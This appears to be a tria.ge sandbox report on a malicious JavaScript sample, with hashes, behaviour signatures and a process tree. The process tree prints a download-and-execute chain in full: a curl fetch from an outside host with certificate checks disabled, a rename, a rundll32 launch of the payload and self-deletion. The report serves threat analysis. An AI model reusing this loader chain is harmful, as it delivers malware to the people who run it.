Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
01/09/2023, 16:49
Static task
static1
Behavioral task
behavioral1
Sample
fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
Resource
win10v2004-20230831-en
General
-
Target
fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
-
Size
34KB
-
MD5
d38a35de750d0d8628cb073a9a0ad8b2
-
SHA1
b98af1c8fe2a75060fa25a7eee20c32518271822
-
SHA256
fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947
-
SHA512
b7348f060b646efd8e7501ce7a411346b7de95a715b7a1d2294df32c2b4ed425262ef0102af2d72c5f3d0f5f8db2f0feede4f5885a2fa6d48f9c2c9b40cde247
-
SSDEEP
768:RwRahuDvIhINs1sCT7A797k7a7a7Q7u7F7r7e7I7B7C7D7N7y7o727B7of7y7M76:RwRahBhIN3CTMJ4W+cC5fS0VWnJWk6l5
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2696 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2440 wrote to memory of 2696 2440 wscript.exe 28 PID 2440 wrote to memory of 2696 2440 wscript.exe 28 PID 2440 wrote to memory of 2696 2440 wscript.exe 28 PID 2440 wrote to memory of 2112 2440 wscript.exe 30 PID 2440 wrote to memory of 2112 2440 wscript.exe 30 PID 2440 wrote to memory of 2112 2440 wscript.exe 30 PID 2440 wrote to memory of 2720 2440 wscript.exe 32 PID 2440 wrote to memory of 2720 2440 wscript.exe 32 PID 2440 wrote to memory of 2720 2440 wscript.exe 32 PID 2440 wrote to memory of 2660 2440 wscript.exe 34 PID 2440 wrote to memory of 2660 2440 wscript.exe 34 PID 2440 wrote to memory of 2660 2440 wscript.exe 34 PID 2440 wrote to memory of 2628 2440 wscript.exe 36 PID 2440 wrote to memory of 2628 2440 wscript.exe 36 PID 2440 wrote to memory of 2628 2440 wscript.exe 36 PID 2440 wrote to memory of 2948 2440 wscript.exe 37 PID 2440 wrote to memory of 2948 2440 wscript.exe 37 PID 2440 wrote to memory of 2948 2440 wscript.exe 37
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js1⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js"2⤵
- Deletes itself
PID:2696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"2⤵PID:2112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"2⤵PID:2720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" "dignissimos.n"2⤵PID:2660
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\dignissimos.n", scab /k arabika7522⤵PID:2628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"2⤵PID:2948
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
149B
MD5c35fe7fbb1aec6c72da5d0fdeb26c222
SHA1f0ef85f0d7fed0b54dc9f7fadf777089b1f404f8
SHA256737835adf64ffb2bfd6dc3d7ab2d23d2c82f292ec736997f5fa5f89eb8c13983
SHA512727213eeebfeb2222113a683e681642bbb7d3df42e32ae0e4457689b7bb8c6630122b1b6c1d220073b1ac44c749cf03d3074ec034237cec2f0680126eef875ff